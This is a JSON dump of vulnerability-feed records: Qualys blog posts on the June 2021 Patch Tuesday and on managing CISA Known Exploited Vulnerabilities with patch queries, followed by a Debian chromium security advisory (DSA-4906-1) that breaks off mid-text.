CVE-2021-1675,CVE-2021-26414,CVE-2021-31199,CVE-2021-31201,CVE-2021-31951,CVE-2021-31952,CVE-2021-31953,CVE-2021-31954,CVE-2021-31955,CVE-2021-31956,CVE-2021-31958,CVE-2021-31959,CVE-2021-31960,CVE-2021-31962,CVE-2021-31968,CVE-2021-31969,CVE-2021-31970,CVE-2021-31971,CVE-2021-31972,CVE-2021-31973,CVE-2021-31974,CVE-2021-31975,CVE-2021-31976,CVE-2021-31977,CVE-2021-33742 \n91773| Microsoft 3D Viewer Multiple Vulnerabilities - June 2021| High| CVE-2021-31944,CVE-2021-31943,CVE-2021-31942 \n91774| Microsoft Paint 3D Remote Code Execution Vulnerability| High| CVE-2021-31983,CVE-2021-31946,CVE-2021-31945 \n91775| Microsoft Windows VP9 Video Extension Remote Code Execution Vulnerability| Medium| CVE-2021-31967 \n91777| Microsoft Windows DWM Core Library Elevation of Privilege Vulnerability - June 2021 | High| CVE-2021-33739 \n \n### Adobe Patch Tuesday \u2013 June 2021\n\nAdobe addressed 41 CVEs this Patch Tuesday, and 21 of them are rated as critical severity impacting Acrobat and Reader, Adobe Photoshop, Creative Cloud Desktop Application, RoboHelp Server, Adobe After Effects, and Adobe Animate products.\n\nAdobe Security Bulletin| QID| Severity| CVE ID \n---|---|---|--- \nAdobe Animate Multiple Security Vulnerabilities (APSB21-50)| 91770| Medium| CVE-2021-28630,CVE-2021-28619,CVE-2021-28617,CVE-2021-28618,CVE-2021-28621,CVE-2021-28620,CVE-2021-28629,CVE-2021-28622 \nAdobe Security Update for Adobe Acrobat and Reader( APSB21-37)| 375611| High| CVE-2021-28551,CVE-2021-28554,CVE-2021-28552,CVE-2021-28631,CVE-2021-28632 \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91768` OR qid:`91769` OR qid:`91770` OR qid:`91771` OR qid:`91772` OR qid:`91773` OR qid:`91774` OR qid:`91775` OR qid:`91777` OR qid:`110383` OR qid:`110384` OR qid:`110385` OR qid:`375611` OR qid:`375614`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91768` OR qid:`91769` OR qid:`91770` OR qid:`91771` OR qid:`91772` OR qid:`91773` OR qid:`91774` OR qid:`91775` OR qid:`91777` OR qid:`110383` OR qid:`110384` OR qid:`110385` OR qid:`375611` OR qid:`375614`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://qualys-secure.force.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Patches_](<https://www.brighttalk.com/webcast/11673/491681>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * VMware vCenter Server Multiple Vulnerabilities\n * Ubuntu XStream Vulnerabilities\n * Microsoft Patch Tuesday, June 2021\n\n[Join us live or watch on demand](<https://www.brighttalk.com/webcast/11673/491681>)!\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-06-08T21:19:29", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (June 2021) \u2013 Microsoft 50 Vulnerabilities with 5 Critical, Adobe 21 Critical Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-26420", "CVE-2021-28551", "CVE-2021-28552", "CVE-2021-28554", "CVE-2021-28617", "CVE-2021-28618", "CVE-2021-28619", "CVE-2021-28620", "CVE-2021-28621", "CVE-2021-28622", "CVE-2021-28629", "CVE-2021-28630", "CVE-2021-28631", "CVE-2021-28632", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31938", "CVE-2021-31939", "CVE-2021-31940", "CVE-2021-31941", "CVE-2021-31942", "CVE-2021-31943", "CVE-2021-31944", "CVE-2021-31945", "CVE-2021-31946", "CVE-2021-31948", "CVE-2021-31949", "CVE-2021-31950", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31957", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-31978", "CVE-2021-31983", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T21:19:29", "id": "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:22:18", "description": "\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\n\n* [CVE-2021-21201](https://security-tracker.debian.org/tracker/CVE-2021-21201)\nGengming Liu and Jianyu Chen discovered a use-after-free issue.\n* [CVE-2021-21202](https://security-tracker.debian.org/tracker/CVE-2021-21202)\nDavid Erceg discovered a use-after-free issue in extensions.\n* [CVE-2021-21203](https://security-tracker.debian.org/tracker/CVE-2021-21203)\nasnine discovered a use-after-free issue in Blink/Webkit.\n* [CVE-2021-21204](https://security-tracker.debian.org/tracker/CVE-2021-21204)\nTsai-Simek, Jeanette Ulloa, and Emily Voigtlander discovered a\n use-after-free issue in Blink/Webkit.\n* [CVE-2021-21205](https://security-tracker.debian.org/tracker/CVE-2021-21205)\nAlison Huffman discovered a policy enforcement error.\n* [CVE-2021-21207](https://security-tracker.debian.org/tracker/CVE-2021-21207)\nkoocola and Nan Wang discovered a use-after-free in the indexed database.\n* [CVE-2021-21208](https://security-tracker.debian.org/tracker/CVE-2021-21208)\nAhmed Elsobky discovered a data validation error in the QR code scanner.\n* [CVE-2021-21209](https://security-tracker.debian.org/tracker/CVE-2021-21209)\nTom Van Goethem discovered an implementation error in the Storage API.\n* [CVE-2021-21210](https://security-tracker.debian.org/tracker/CVE-2021-21210)\n@bananabr discovered an error in the networking implementation.\n* [CVE-2021-21211](https://security-tracker.debian.org/tracker/CVE-2021-21211)\nAkash Labade discovered an error in the navigation implementation.\n* [CVE-2021-21212](https://security-tracker.debian.org/tracker/CVE-2021-21212)\nHugo Hue and Sze Yui Chau discovered an error in the network configuration\n user interface.\n* [CVE-2021-21213](https://security-tracker.debian.org/tracker/CVE-2021-21213)\nraven discovered a use-after-free issue in the WebMIDI implementation.\n* [CVE-2021-21214](https://security-tracker.debian.org/tracker/CVE-2021-21214)\nA use-after-free issue was discovered in the networking implementation.\n* [CVE-2021-21215](https://security-tracker.debian.org/tracker/CVE-2021-21215)\nAbdulrahman Alqabandi discovered an error in the Autofill feature.\n* [CVE-2021-21216](https://security-tracker.debian.org/tracker/CVE-2021-21216)\nAbdulrahman Alqabandi discovered an error in the Autofill feature.\n* [CVE-2021-21217](https://security-tracker.debian.org/tracker/CVE-2021-21217)\nZhou Aiting discovered use of uninitialized memory in the pdfium library.\n* [CVE-2021-21218](https://security-tracker.debian.org/tracker/CVE-2021-21218)\nZhou Aiting discovered use of uninitialized memory in the pdfium library.\n* [CVE-2021-21219](https://security-tracker.debian.org/tracker/CVE-2021-21219)\nZhou Aiting discovered use of uninitialized memory in the pdfium library.\n* [CVE-2021-21221](https://security-tracker.debian.org/tracker/CVE-2021-21221)\nGuang Gong discovered insufficient validation of untrusted input.\n* [CVE-2021-21222](https://security-tracker.debian.org/tracker/CVE-2021-21222)\nGuang Gong discovered a buffer overflow issue in the v8 javascript\n library.\n* [CVE-2021-21223](https://security-tracker.debian.org/tracker/CVE-2021-21223)\nGuang Gong discovered an integer overflow issue.\n* [CVE-2021-21224](https://security-tracker.debian.org/tracker/CVE-2021-21224)\nJose Martinez discovered a type error in the v8 javascript library.\n* [CVE-2021-21225](https://security-tracker.debian.org/tracker/CVE-2021-21225)\nBrendon Tiszka discovered an out-of-bounds memory access issue in the v8\n javascript library.\n* [CVE-2021-21226](https://security-tracker.debian.org/tracker/CVE-2021-21226)\nBrendon Tiszka discovered a use-after-free issue in the networking\n implementation.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 90.0.4430.85-1~deb10u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-27T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2022-07-21T05:50:45", "id": "OSV:DSA-4906-1", "href": "https://osv.dev/vulnerability/DSA-4906-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2022-08-03T14:52:36", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4906-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nApril 27, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2021-21201 CVE-2021-21202 CVE-2021-21203 CVE-2021-21204\n CVE-2021-21205 CVE-2021-21207 CVE-2021-21208 CVE-2021-21209\n CVE-2021-21210 CVE-2021-21211 CVE-2021-21212 CVE-2021-21213\n CVE-2021-21214 CVE-2021-21215 CVE-2021-21216 CVE-2021-21217\n CVE-2021-21218 CVE-2021-21219 CVE-2021-21221 CVE-2021-21222\n CVE-2021-21223 CVE-2021-21224 CVE-2021-21225 CVE-2021-21226\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2021-21201\n\n Gengming Liu and Jianyu Chen discovered a use-after-free issue.\n\nCVE-2021-21202\n\n David Erceg discovered a use-after-free issue in extensions.\n\nCVE-2021-21203\n\n asnine discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2021-21204\n\n Tsai-Simek, Jeanette Ulloa, and Emily Voigtlander discovered a\n use-after-free issue in Blink/Webkit.\n\nCVE-2021-21205\n\n Alison Huffman discovered a policy enforcement error.\n\nCVE-2021-21207\n\n koocola and Nan Wang discovered a use-after-free in the indexed database.\n\nCVE-2021-21208\n\n Ahmed Elsobky discovered a data validation error in the QR code scanner.\n\nCVE-2021-21209\n\n Tom Van Goethem discovered an implementation error in the Storage API.\n\nCVE-2021-21210\n\n @bananabr discovered an error in the networking implementation.\n\nCVE-2021-21211\n\n Akash Labade discovered an error in the navigation 